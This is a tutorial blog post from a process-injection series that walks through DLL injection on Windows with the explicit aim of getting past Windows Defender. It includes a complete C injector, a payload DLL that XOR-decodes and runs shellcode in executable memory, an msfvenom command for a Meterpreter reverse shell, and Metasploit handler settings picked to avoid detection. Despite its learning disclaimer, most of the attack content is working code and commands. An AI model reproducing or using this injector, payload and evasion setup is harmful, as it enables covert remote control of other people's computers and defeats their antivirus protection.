Process Injection Series Part II: DLL Injection

Published in InfoSec Write-ups, Aug 5, 2023

Using MITRE Technique T1055.001 to bypass Windows Defender

Welcome to the next installment of the process injection series. We will be exploring DLL injection in this one. Get your Visual Studio and MSDN pages ready to fully advance your knowledge on this topic!

Mandatory Disclaimer

Methods and code shown in this series are solely to be used as learning examples. I take no responsibility for the misuse of the methods and code shown.

DLL Injection, what is it?

As this is a continuation of my previous blog post, I’ll assume you already know what a process is.

You can think of DLLs (Dynamic-link Libraries) as small programs that a bigger program can load. DLLs expose functions through their export table, which other programs can then call. An example of a DLL is Kernel32.dll. You can find the functions that this DLL provides here.

Loading Kernel32 allows a program to use the functions exported by it, rather than having to implement their own functions.

DLL injection abuses that fact: by creating a malicious DLL and loading it into the memory of a target process, an attacker can achieve code execution.

Source of the gif: https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

The steps to this attack are similar to PE injection. The attacker performs the following steps:

Obtains a handle on the target process
Allocates the required memory inside the process
Writes the DLL path into that memory (the DLL must be on disk)
Starts a new thread in the target process that loads the DLL

Once the DLL is loaded, it can execute its payload. Payloads range widely, from cmd one-liners to shellcode injection. In this post, I’ll showcase the shellcode injection method as I believe it’s more OPSEC-friendly than starting a cmd prompt.

The DLL will:

Allocate memory for the shellcode
Copy the shellcode to the allocated space
Start a new thread

As in previous cases, the code will be available on my GitHub.

Writing the injector and payload

The code will use WinAPIs to achieve our goal. Unlike PE injection, this will require dropping a DLL to the disk of our target.

 int pid = atoi(argv[1]);

 printf("Obtaining handle to target process");
 HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, 0, pid);
 if (hProcess == NULL) {
  Error("Failed in obtaining handle to process");
 }
 printf("Allocating memory...\n");
 void* buffer = VirtualAllocEx(hProcess, NULL, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 if (buffer == NULL) {
  Error("Failed in allocating memory");
 }
 printf("Writing memory...\n");
 if (!WriteProcessMemory(hProcess, buffer, argv[2], strlen(argv[2]), NULL)) {
  return Error("Failed in WriteProcessMemory");
 }
 printf("Creating remote thread...\n");
 HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
  (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryA"),
  buffer, 0, NULL);
 if (!hThread)
  return Error("Failed to create thread");
 printf("SUCCESS!");

As before, if you want to learn more about each of the functions, you can visit their respective MSDN pages.

Starting off, our injector opens a handle to the target process via OpenProcess. This function requires the following arguments:

Desired access to the process
Inherit value
PID of the target process

The desired access is a way to additionally reduce our detection rates. We could request full access to the process, but if we request only the bare minimum of permissions needed we can avoid suspicion.

The code obtains the PID via a command line argument, but there are ways to obtain a PID automatically. One example would be to use CreateToolhelp32Snapshot to create a snapshot of all processes and then iterate through them to find the desired target process.

It is, of course, good practice to handle any errors that arise while using these functions: OpenProcess can fail, and that failure should be handled.

Moving on, the next function used is VirtualAllocEx, which requires the following arguments:

Handle to a process
Pointer to a starting address (optional)
The size of memory to allocate
What type of memory to reserve
The memory protection of the allocated region

Here we can see the first difference between PE injection and DLL injection. In PE injection we write shellcode into the target, so the memory must be executable, which leads to a region with RWX permissions. Here, RW permissions are sufficient, because the buffer only holds the DLL path as a string; it is read by LoadLibraryA and never executed.

Additionally, << is the bitwise left-shift operator: 1 << 12 multiplies 1 by 2 to the 12th power, giving 4096 bytes, which is one page on x86 and x64 Windows.
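To make the shift concrete, here is a small portable C sketch. The helper name bytes_from_shift is hypothetical and not part of the injector; it only shows how a shift count maps to a byte count.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: returns 2^shift as a byte count.
   The shift must be smaller than the bit width of size_t,
   otherwise the shift would be undefined behavior in C. */
size_t bytes_from_shift(unsigned shift)
{
    assert(shift < sizeof(size_t) * 8);
    return (size_t)1 << shift;
}
```

Calling bytes_from_shift(12) yields 4096, the same size that is passed to VirtualAllocEx in the listing above.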

The next step is to write the path of our DLL into the allocated memory space. This is achieved via WriteProcessMemory, which takes the following arguments:

Handle to a process
Pointer to the base of the memory to write to
Pointer to the buffer containing the data to be written
Number of bytes to be written
A pointer to a variable that receives the number of bytes written (optional)

When providing the DLL path, make sure it’s the full system path. The DLL might be local to the injector but to the target process, it won’t be.
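One detail about the "number of bytes" argument is worth spelling out: strlen does not count the terminating NUL byte of a C string. The listing above passes strlen(argv[2]), which still works because memory freshly committed by VirtualAllocEx is zero-initialized, so the byte after the path is already 0. The plain C sketch below, with a hypothetical helper name and an example path, shows how many bytes a complete C string occupies.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: number of bytes needed to copy a C string
   together with its terminating NUL byte. */
size_t c_string_bytes(const char *s)
{
    assert(s != NULL);
    return strlen(s) + 1; /* strlen excludes the terminator */
}
```

For the example path "C:\\temp\\a.dll" (13 characters), c_string_bytes returns 14.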

Finally, we start a new thread via CreateRemoteThread. This function requires the following arguments:

A handle to the process
A pointer to a SECURITY_ATTRIBUTES structure; if NULL, the thread gets a default security descriptor
Initial size of the stack; if 0, the thread uses the default size for the executable
A pointer to the starting point of the function in the remote process
A pointer to the arguments to be passed to the thread function
A value that controls the state of the created thread
Pointer to a variable that receives the thread identifier

Here we can see an additional change: since we are loading a DLL, the remote thread needs to run the LoadLibraryA function, and CreateRemoteThread needs the address of that function. We can use GetProcAddress to obtain it. It requires the following arguments:

A handle to the module that exports the function (obtained here with GetModuleHandle from the module name)
The name of the desired function

GetProcAddress returns the address of LoadLibraryA in our own process. Windows does not formally guarantee it, but in practice core system DLLs such as kernel32.dll are mapped at the same base address in every process of the same architecture until the next reboot, so the address is also valid in the remote process. This assumes the injector and the target have the same bitness. Finally, we need to cast the return value to LPTHREAD_START_ROUTINE.

With that, we pass the execution flow to the DLL. The DLL will host our shellcode and inject it into the local process.

Note: DO NOT USE SHELLCODE FROM THE INTERNET

#include "pch.h"
#include "Windows.h"

unsigned char shellcode[] = "xor'd shellcode"

int run()
{    
    HANDLE hThread = nullptr;

    char key = 'key';
    int i = 0;
    for (i; i < sizeof(shellcode) - 1; i++)
    {
        shellcode[i] = shellcode[i] ^ key;
    }

 void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 memcpy(exec, shellcode, sizeof(shellcode));

    hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, NULL, 0, NULL);
    if (!hThread) {
        return 1;
    }
 //((void(*)())exec)();

 return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        run();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

I generated my shellcode with the following command msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f c.

To avoid AV, we need to obfuscate the shellcode. We can still use the simple XOR script I made for my previous injection technique.

We will also do a trick, we will declare our shellcode as a global variable. This in turn will move our shellcode from the .text section to the .data section of our DLL.

Our function run will first XOR our shellcode again (returning it to the original shellcode), after which it will allocate the memory needed using VirtualAlloc.

Here we can see the usual permission of RWX required. There is a way to make this less suspicious, we would first set the permissions to RW, write our shellcode, then set the permissions to RX to not invoke suspicion. Feel free to try and implement this as an exercise.

After allocating the space, we copy the shellcode to the allocated region. Now we can just execute that code? Right…?

Introducing the loader lock: a process-wide lock that the Windows loader holds while it modifies the module list and while DllMain runs, so that only one thread at a time loads or unloads modules. It’s a safeguard that ensures DLL initialization and cleanup happen in a safe order.

In our case, this means long-running or blocking code should not run directly inside DllMain, as it can deadlock the process. An easy “bypass” is to create a new thread and execute the shellcode in that thread.

We add the function run to the DLL_PROCESS_ATTACH case to ensure it’s called as soon as the DLL is loaded. With that, we obtain code execution.

Bypassing Defender and Demo

If we were to run the injection as is, Defender would alert. After trial and error, I realized that the alert was triggered by the 2nd stage payload rather than the initial payload. Luckily, Metasploit offers encoders for its 2nd stages. Additionally, we can set AutoLoadStdApi to false. This option controls whether the stdapi extension, which provides most Meterpreter commands, is loaded automatically when the session opens. We disable it to reduce the probability of being detected; we can always load the API after obtaining the shell.

The final reverse shell handler then looks like this:

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set autoloadstdapi false
autoloadstdapi => false
msf6 exploit(multi/handler) > set stageencoder ppc/longxor
stageencoder => ppc/longxor
msf6 exploit(multi/handler) > run

And the demo:

The end

I’ll continue working on process injection as it’s a great learning opportunity. DLL injection in itself is not widely used, since it requires a DLL to be on disk, but reflective DLL loading is a way to avoid such an issue. These initial techniques and their code can be upgraded step-by-step to more advanced exploitation techniques. One should not disregard the basics when learning new things!

A few pointers to improve the code:

Find the target process automatically
Allocate memory space in a way that reduces suspicion
Use this to reduce the number of imports

Feel free to comment and reach out with questions, I’d gladly try to answer them :D.